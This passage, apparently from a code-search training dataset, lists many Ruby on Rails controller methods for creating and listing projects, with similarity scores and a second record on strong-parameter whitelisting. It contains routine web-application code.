"def create\n @project = current_user.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @projects = current_user.projects\n @project = current_user.projects.new(project_params)\n\n respond_to do |format|\n if @projects << @project\n format.html { redirect_to user_projects_path(current_user), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @projects = Project.all\n @project = Project.find_by_id(params[:project_id])\n if !@project.blank?\n @visit = Visit.where(user_id: current_user.id, visitable_id: @project.id, visitable_type: 'Project').first\n if !@visit.blank?\n @visit.destroy\n end\n Visit.create(user_id: current_user.id, visitable_id: @project.id, visitable_type: 'Project')\n @activity = Activity.create(user_id: current_user.id, activity_type: 'View', target_type: 'Project', target_id: @project.id)\n\n end\n end",
"def create\n @user = current_user\n @project = @user.projects.build(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@project = current_user.projects.new(project_params)\n\n\t\trespond_to do |format|\n\t\t\tif @project.save\n\t\t\t\tformat.json { render :show, status: :created }\n\t\t\telse\n\t\t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n @project = Project.new(:project_title => params[:project_title], :start_date => params[:startDate], :end_date => params[:endDate],\n :status => params[:project_status])\n\n @project.user_id = current_user.id\n\n\n respond_to do |format|\n if @project.save\n p \"pass on projects controller\"\n format.html { redirect_to @project}\n format.json { render json: \"ok\" }\n else\n p \"fail on projects controller\"\n end\n end\n\n\n end",
"def new_project\n @request = Request.new(data_type: :project)\n @request.build_contact\n @request.build_project\n @request.build_general_information\n\n render 'new'\n end",
"def new\n @project = @client.projects.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render xml: @project }\n end\n end",
"def create\n authorize Project\n\n @project = Project.new(project_params)\n @project.created_by = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @create_project = current_user.projects.build(params[:project])\n flash[:notice] = \"Project #{@create_project.description} successfully created\" if @create_project.save\n respond_with(@create_project, layout: !request.xhr?)\n end",
"def create\t\t\t\t\t\t\t\t\t# Creates record in db and redirects (porbably to index)\n\t\t@project = Project.new(projects_params)\t# Passes only title and desc.\n\n \trespond_to do |format|\t\t\t\t\t# All this is doing is rendering stuff in case of json\n \t\tif @project.save\n \t\tformat.html { redirect_to @project, notice: 'Created a new project!' }\n \t\tformat.json { render :show, status: :created, location: @project }\n \t\telse\n \t\tformat.html { render :new }\n \t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n \t\tend\n \tend\n\tend",
"def create\n @project = current_user.projects.new(project_params)\n\n respond_to do |format|\n if @project.save\n format.html {redirect_to \"/projects\", notice: \"Project was successfully created.\"}\n format.json {render :show, status: :created, location: @project}\n else\n format.html {render :new, status: :unprocessable_entity}\n format.json {render json: @project.errors, status: :unprocessable_entity}\n end\n end\n end",
"def create\n initiative = Initiative.find_by_id(project_params[:initiative_id])\n if initiative.nil?\n @project = Project.new(project_params)\n else\n @project = initiative.projects.build(project_params)\n end\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @board, notice: @project.name + ' was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.status = \"Etat zero\"\n creator = current_user\n ProjectUser.create(:project => @project, :user => creator, :admin => true)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @partner_project = PartnerProject.new(params[:partner_project])\n\n respond_to do |format|\n if @partner_project.save\n format.html { redirect_to @partner_project, notice: 'Partner project was successfully created.' }\n format.json { render json: @partner_project, status: :created, location: @partner_project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @partner_project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @client_name = params[:id]\n unless @client_name.nil?\n client = Client.find_by_name(@client_name)\n @project = client.projects.new\n end\n render :layout => false\n end",
"def new\n propose_nr = Integer(Project.order(\"nr desc\").first.nr) + 1\n @project = Project.new(:nr => propose_nr, :active => true)\n @project.tasks.new(:name => \"Project Mgmt\", :description => \"\")\n @project.tasks.new(:name => \"Pre-P\", :description => \"Moodboards | Examining project data, plans, briefing, etc.\")\n @project.tasks.new(:name => \"Web\", :description => \"Flatfinder/Boligvelger (eve-Estate) | CMS/Website (eve-Publisher) | Landingpage\")\n @project.tasks.new(:name => \"Undividable 3D work for exteriors\", :description => \"Modeling/texturing of buildings and their surroundings. Populating/detailing with plants, outdoor furniture, traffic, etc.\")\n @project.tasks.new(:name => \"Undividable 3D work for interiors\", :description => \"Modeling/texturing of X apartments. Setting up furniture, accessories, decoration according to moodboards.\")\n @project.tasks.new(:name => \"#{propose_nr}-01_e\", :description => \"Scene setup, lighting and detail adjustments, rendering with subsequent post-production/compositing.\")\n @project.tasks.order(:name)\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.new.new_project_steps @current_user, project_params\n respond_to do |format|\n if @project.save\n @current_user.projects << @project\n @current_user.save\n format.html { redirect_to root_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render partial: 'form' }\n format.js { render partial: 'dashboard_new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @project_activities = ProjectActivity.all\n end",
"def create\n @project = current_user.projects.new(project_params)\n authorize_action_for @project\n @project.category_id = category_params\n respond_to do |format|\n if @project.save\n @project.configure_contributors(contributor_params)\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n @categories = Category.where(user_id: nil) + current_user.categories\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @project = Project.new\n @project.tasks.build\n @categories = Category.parents_only\n\n respond_to do |format|\n format.html # new.html.erb\n format.json {\n \trender :json => {\n \t :projects => @proejcts,\n \t :categories => @categories\n \t}\n }\n end\n end",
"def create\n @project = Project.new(project_params)\n authorize! :create, @project\n @project.user_id ||= current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @client = Client.new\n 1.times { @client.projects.build }\n 1.times { @client.notes.build }\n respond_with(@client)\n end",
"def create\n project_params[:owner_id] = current_user.id if project_params[:owner_id].nil? or not current_user.is_admin?\n @project = Project.new(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_url, notice: 'Project was successfully created.' }\n format.json { head :no_content }\n else\n format.html { render action: 'new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: \"Project was successfully created.\" }\n User.find(current_user.id).projects << Project.find(@project.id)\n @projects_user = ProjectsUser.find_by(user_id: current_user.id, project_id: @project.id)\n format.json { render :show, status: :created, location: @project }\n\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n current_user.projects << @project\n authorize @project\n if @project.save\n redirect_to @project, notice: I18n.t('flash.actions.project.create.notice')\n else\n render :new \n end\n end",
"def create\n @project = Project.new(params[:project])\n<<<<<<< HEAD:app/controllers/projects_controller.rb\n handle_disciplines_projects\n=======\n>>>>>>> 336471e6be257cf55c9afa2a65f928fde34e41fe:app/controllers/projects_controller.rb\n\n respond_to do |format|\n if @project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @activities_project = ActivitiesProject.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @activities_project }\n end\n end",
"def create\n @dev_activity = current_user.dev_activities.create(dev_activity_params)\n\n respond_to do |format|\n if @dev_activity.save\n format.html { redirect_to user_dev_activities_path(current_user), notice: 'The Development Activity was successfully created.' }\n format.json { render action: 'show', status: :created, location: @dev_activity }\n else\n format.html { render action: 'new' }\n format.json { render json: @dev_activity.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.create project_params\n current_user.memberships.create(\n project_id: @project.id,\n owner_at: Time.now\n )\n\n if @project.save\n render 'projects/create', status: 201\n else\n render 'projects/error', status: 422\n end\n end",
"def create\n @new_project = Project.new(params[:project])\n @new_project.created_by = current_user.login\n\n respond_to do |format|\n if @new_project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(project_path(@new_project)) }\n format.xml { render :xml => @project, :status => :created, :location => @new_project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @new_project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.created_by = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if project.save\n format.html { redirect_to project, notice: 'Project was successfully created.' }\n format.json { render json: project, status: ':created', location: project }\n else\n format.html { render action: 'new' }\n format.json { render json: project.errors, status: ':unprocessable_entity' }\n end\n end\n end",
"def new\n @campaign = Campaign.find(params[:campaign_id])\n @project = @campaign.projects.new(params[:project])\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.new(params[:project])\n\t\t@project.user_id =current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.creator = current_user\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n else\n format.html { render :new }\n end\n end\n end",
"def create\n #byebug\n @project = Project.new(create_params)\n @project.user_id = @current_user.id\n @project.save\n #@project = Project.create(name_project: \"prueba\", subsidy: true, parking: true, user_id: @current_user.id)\n #byebug\n render json: @project, status: :created\n end",
"def create\n @dashboard_project = current_user.build_project(dashboard_project_params)\n\n respond_to do |format|\n if @dashboard_project.save\n format.html { redirect_to dashboard_project_path(@dashboard_project), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @dashboard_project }\n else\n format.html { render :new }\n format.json { render json: @dashboard_project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.roles.build name: Role.role_types.first,\n user: User.find(session[:id])\n begin \n n_invitations = @project.add_colaborators\n notice = 'Project was successfully created. '\n \n notice += '1 user has been automatically added to the project.' if n_invitations == 1\n notice += n_invitations.to_s + ' users have been automatically added to the project.' if n_invitations > 1\n\n rescue\n redirect_to @project, notice: \"An error occurred. You may have entered invalid github information.\"\n return\n end \n \n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: notice }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@project = Project.new(params[:project].merge({:user_id => present_user.id}))\n\t\tmake_breadcrumbs\n\n\t\trespond_to do |format|\n\t\t\tif @project.save\n\t\t\t\tformat.html { redirect_to @project, notice: t('app.projects.created') }\n\t\t\t\tformat.json { render json: @project, status: :created, location: @project }\n\t\t\telse\n\t\t\t\tformat.html { render action: \"new\" }\n\t\t\t\tformat.json { render json: @project.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n\n respond_to do |format|\n if @project.save\n\n format.html { redirect_to @project, success: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n flash[:notice] = 'Project was successfully created.'\n format.html { redirect_to(:action=>'show', :ids=>@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n @project.user_projects.create(:user_id => current_user.id, :status => true, :role => 1)\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #cid = params[:project].delete(:Client)\n #puts cid.to_s\n #puts params[:planned_efforts_days].to_s + \", \" + params[:planned_efforts_hours].to_s\n planned_eff = params[:planned_efforts_days].to_i*86400 + params[:planned_efforts_hours].to_i*3600\n #puts planned_eff.to_s\n @project = Project.new(params[:project])\n #@project.Client_id = cid\n @project.planned_efforts = planned_eff\n\n respond_to do |format|\n if @project.save\n #also create membership\n m = Membership.new(:user_id => current_user.id, :project_id => @project.id, :status => 3)\t# status => 3: current_user is owner of project\n if m.save\n format.html { redirect_to projects_url, notice: 'Project was successfully created.' }\n format.js\n format.json { render json: @project, status: :created, location: @project }\n end\n else\n format.html { render action: \"new\" }\n format.js { render :action => 'new' }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n do_new_resource\n get_project_site\n do_set_attributes\n do_authorize_instance\n\n respond_new\n end",
"def create\n @project = Project.new(project_params)\n @project.owner = current_user unless @project.owner\n if @project.save\n render :show, status: :created, location: @project\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(params[:project])\n @categories = Category.parents_only\n\n respond_to do |format|\n if @project.save\n flash[:success] = 'Project was successfully created.'\n format.html { redirect_to project_path(@project) }\n format.json { render json: @project, status: :created, location: project_path(@project) }\n else\n format.html { render action: \"new\" }\n format.json {\n \trender json: {\n \t\t:'project.errors' => @project.errors,\n \t\t:categories => @categories\n \t},\n \tstatus: :unprocessable_entity\n }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.creator_id = current_user.id\t \n respond_to do |format|\n if @project.save\n @project.users << current_user\n format.html { redirect_to project_path(@project), notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n @main_projects = Project.roots.where(creator_id: @project.creator_id)\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n @project.memberships.new(user: current_user,role:'Creator')\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n service_result = Organizers::BuildJoinTableObjects.call(project_params, 'project', :create)\n @project = service_result.main_object\n\n if service_result.failure?\n render json: {errors: errors_as_array_hash(service_result.message)}, status: :unprocessable_entity\n else\n render :show, status: :created, location: @project\n end\n end",
"def create\n if !current_user\n respond_to do |format|\n format.html { redirect_to '/competitions/new' }\n end\n return\n end\n\n @competition = Competition.new(competition_params)\n @competition.creator_id = current_user.id\n respond_to do |format|\n if @competition.save\n @competition.create_activity :create, owner: current_user\n format.html { redirect_to @competition, notice: 'Competition was successfully created.' }\n format.json { render :show, status: :created, location: @competition }\n else\n format.html { render :new }\n format.json { render json: @competition.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @project = Project.new(project_params)\n @project.user_id = current_user.id ? current_user.id : 0\n @project.is_enabled = Constants::DISABLED\n @project.status = Constants::NEW\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.new(project_params)\n if @project.save\n render :show\n else\n render json: { errors: @project.errors }\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to root_path, notice: 'Enhorabuena! Tienes un nuevo proyecto. A trabajar!' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.json { render :json => @project, :status => :created, :location => @project }\n format.html { redirect_to(projects_path) }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new_link\n @project = Project.new(user_id: current_user.id)\n fetch_projects\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n\t @user = User.find(current_user)\n\t @clients = Client.all\n\t @projects = Project.all\n\t @places = Place.all\n\t @types = Type.all\n\t @responsibles = Responsible.all\n\t @task = @user.tasks.create(task_params)\n\n\t redirect_to task_path(@tasks) \n\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params.merge(user_id: current_user.id))\n\n respond_to do |format|\n if @project.save\n format.json { render :show, status: :created, location: @project }\n else\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.create(params[:project] )\n respond_to do |format|\n if @project.save\n format.html { redirect_to user_project_path current_user.id,@project.id }\n else\n render 'new', :message => \"there is some error\"\n end\n end\n end",
"def create\n @project = TaskTracker::Project.new(project_params)\n @project.fractal_interface = @user.task_tracker_interface\n\n if @project.save\n render :show, status: :created, location: @project\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(project_params)\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: projects_path }\n else\n @companies = Company.none\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = @user.projects.create(project_params)\n\n # Save and redirect to user projects with a notice at the top saying that the project has been created\n\n if @project.save\n redirect_to(user_projects_path(@project), notice: 'Project was successfully created.')\n else\n render action: 'new'\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.lead_id = current_user.id\n @project.workspace_id = params[:workspace_id]\n if @project.save\n 5.times do\n Task.create(name: \"New Task\", creator_id: current_user.id, workspace_id: current_user.homespace_id, project_id: @project.id)\n end\n\n render :show, status: :created\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.account_id = current_user.account_id\n respond_to do |format|\n if @project.save\n format.html { redirect_to(projects_path, :notice => 'Project was successfully created.') }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\", :error => 'Erro' }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.institute = current_institute\n \n respond_to do |format|\n if @project.save\n format.html { redirect_to add_path(@project), notice: 'Project was successfully created.' }\n format.json { render :add, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.user_id = current_user.id;\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to edit_project_path(@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_activity\n player = Player.find_or_create_by(email:req_params[:email])\n project = Project.find_by(name:req_params[:project])\n event = req_params[:event]\n count = req_params[:count]\n @activity = Activity.get_activity_type(player,event,project,count)\n\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to(@project, :notice => 'Project was successfully created.') }\n format.json { render :json => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.project_developers.new(developer_id: current_user.id, is_creator: true)\n respond_to do |format|\n if @project.save\n format.html { redirect_to add_developer_project_url(@project), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user = current_user\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @projects = current_user.projects.order(created_at: :desc).all\n @new_project = Project.new\n @new_task = Task.new\n end"
] |
[
"0.7295849",
"0.72820836",
"0.72768223",
"0.7230288",
"0.7114854",
"0.7112128",
"0.70823723",
"0.70475775",
"0.7026554",
"0.7024975",
"0.69616765",
"0.6776181",
"0.675668",
"0.6748249",
"0.67168736",
"0.66727144",
"0.66511714",
"0.66415524",
"0.66052186",
"0.660399",
"0.6602975",
"0.6596937",
"0.65954643",
"0.65910155",
"0.65844244",
"0.65750647",
"0.65720475",
"0.65438956",
"0.65410864",
"0.6539445",
"0.65266705",
"0.65082175",
"0.65026367",
"0.6499207",
"0.64845693",
"0.6482182",
"0.6460701",
"0.64473635",
"0.64452624",
"0.64361686",
"0.6436027",
"0.6431248",
"0.64294755",
"0.6427523",
"0.64243203",
"0.6413714",
"0.64073193",
"0.6404624",
"0.6404439",
"0.64019835",
"0.6397554",
"0.6393942",
"0.6392209",
"0.63908756",
"0.63908446",
"0.63886005",
"0.6386201",
"0.6382398",
"0.6382266",
"0.63820374",
"0.6380272",
"0.63789773",
"0.6378433",
"0.6374581",
"0.63745666",
"0.6366262",
"0.6364617",
"0.6361371",
"0.6358269",
"0.63443553",
"0.6341668",
"0.6341341",
"0.63397443",
"0.63388026",
"0.63386184",
"0.6337114",
"0.6332951",
"0.6329459",
"0.63294405",
"0.6321161",
"0.6311213",
"0.63083726",
"0.6308133",
"0.63039434",
"0.6292496",
"0.6292496",
"0.62919325",
"0.62913245",
"0.6272575",
"0.62701696",
"0.6268399",
"0.6263885",
"0.6263164",
"0.6260567",
"0.62562066",
"0.62551105",
"0.6252435",
"0.6244437",
"0.6243049",
"0.62428665"
] |
0.7051288
|
7
|
Never trust parameters from the scary internet, only allow the white list through.
|
def search_params_user
params.require(:search).permit(:handle, :first_name, :last_name, :email)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
